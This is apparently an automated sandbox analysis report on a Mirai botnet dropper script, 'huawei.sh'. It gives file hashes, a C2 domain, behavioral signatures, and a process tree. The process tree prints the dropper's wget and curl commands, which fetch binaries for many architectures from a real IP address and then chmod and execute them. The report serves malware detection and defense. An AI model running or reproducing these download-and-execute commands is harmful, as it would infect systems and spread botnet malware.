Analysis
-
max time kernel
133s -
max time network
149s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
17-12-2024 15:07
Static task
static1
Behavioral task
behavioral1
Sample
huawei.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
huawei.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
huawei.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
huawei.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
huawei.sh
-
Size
2KB
-
MD5
9bfdac5c8b82517847d1590979a41c35
-
SHA1
1df3546c5413cd12038dd8634caf866ecb49e916
-
SHA256
22236b19790e4e0f36d79cf0f90afdbdd20de713c329ec106e93f29229d012cc
-
SHA512
dffba9334cdb174bc3df07047482a6143ea8a981e25a9d32f52cd63a6ae6627495559721de94e7796ea9acca94ff83350fb91a9e7170493b11c3cb289c4b6408
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1552 chmod 1558 chmod 1564 chmod 1570 chmod 1516 chmod 1522 chmod 1540 chmod 1546 chmod 1575 chmod 1581 chmod 1509 chmod 1528 chmod 1534 chmod -
Deletes itself 1 IoCs
pid Process 1510 WTH -
Executes dropped EXE 13 IoCs
ioc pid Process /tmp/WTH 1510 WTH /tmp/WTH 1517 WTH /tmp/WTH 1523 WTH /tmp/WTH 1529 WTH /tmp/WTH 1535 WTH /tmp/WTH 1541 WTH /tmp/WTH 1547 WTH /tmp/WTH 1553 WTH /tmp/WTH 1559 WTH /tmp/WTH 1565 WTH /tmp/WTH 1571 WTH /tmp/WTH 1576 WTH /tmp/WTH 1582 WTH -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTH File opened for modification /dev/misc/watchdog WTH -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTH File opened for modification /bin/watchdog WTH -
Changes its process name 1 IoCs
description pid Process Changes the process name, possibly in an attempt to hide itself 1510 WTH -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1512 wget 1514 curl 1515 cat -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zmap.x86 curl File opened for modification /tmp/zmap.arm wget File opened for modification /tmp/zmap.arm6 curl File opened for modification /tmp/zmap.ppc wget File opened for modification /tmp/zmap.spc curl File opened for modification /tmp/zmap.i686 curl File opened for modification /tmp/zmap.mips wget File opened for modification /tmp/zmap.m68k curl File opened for modification /tmp/zmap.spc wget File opened for modification /tmp/zmap.sh4 curl File opened for modification /tmp/zmap.arc curl File opened for modification /tmp/zmap.mpsl wget File opened for modification /tmp/zmap.arm5 curl File opened for modification /tmp/zmap.arm7 wget File opened for modification /tmp/zmap.arm7 curl File opened for modification /tmp/zmap.x86 wget File opened for modification /tmp/WTH huawei.sh File opened for modification /tmp/zmap.mips curl File opened for modification /tmp/zmap.mpsl curl File opened for modification /tmp/zmap.arm curl File opened for modification /tmp/zmap.arm5 wget File opened for modification /tmp/zmap.arm6 wget File opened for modification /tmp/zmap.ppc curl File opened for modification /tmp/zmap.m68k wget File opened for modification /tmp/zmap.sh4 wget
Processes
-
/tmp/huawei.sh/tmp/huawei.sh1⤵
- Writes file to tmp directory
PID:1502 -
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
PID:1503
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
PID:1507
-
-
/bin/catcat zmap.x862⤵PID:1508
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.x862⤵
- File and Directory Permissions Modification
PID:1509
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:1510
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1512
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1514
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
PID:1515
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1517
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
PID:1519
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/catcat zmap.mpsl2⤵PID:1521
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1523
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
PID:1525
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/catcat zmap.arm2⤵PID:1527
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1529
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
PID:1531
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/catcat zmap.arm52⤵PID:1533
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1535
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
PID:1537
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/catcat zmap.arm62⤵PID:1539
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1541
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
PID:1543
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/catcat zmap.arm72⤵PID:1545
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1547
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
PID:1549
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/catcat zmap.ppc2⤵PID:1551
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1553
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
PID:1555
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/catcat zmap.m68k2⤵PID:1557
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1559
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
PID:1561
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/catcat zmap.spc2⤵PID:1563
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1565
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.i6862⤵PID:1567
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.i6862⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/catcat zmap.i6862⤵PID:1569
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1571
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
PID:1572
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/catcat zmap.sh42⤵PID:1574
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1576
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arc2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arc2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/catcat zmap.arc2⤵PID:1580
-
-
/bin/chmodchmod +x config-err-QezUlM huawei.sh netplan_qoa392vr snap-private-tmp ssh-XFSPus0dWfPx systemd-private-dc6a883fb225443bbffe00d790a45ac8-bolt.service-ewcsAx systemd-private-dc6a883fb225443bbffe00d790a45ac8-colord.service-opzQ5B systemd-private-dc6a883fb225443bbffe00d790a45ac8-ModemManager.service-qeifPW systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-resolved.service-mvNHja systemd-private-dc6a883fb225443bbffe00d790a45ac8-systemd-timedated.service-m4Q34S WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x862⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/WTH./WTH huawei.selfrep2⤵
- Executes dropped EXE
PID:1582
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD5f51e09e21e26b88091e5817482391af9
SHA135ac89537e69e933a9412877638edd2ddaf48195
SHA256ff15bf021c5804b34110ecab8a8c86dd399c60b246cb626f536a000b26b27e96
SHA51213a46b95db2323015267dd034bde6b2517ea447d091ba7b702aa249ea7172d876156554387b9a5640490b97217f48f843b28f00f65fdc45948a93fbbdb5dd1c3
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225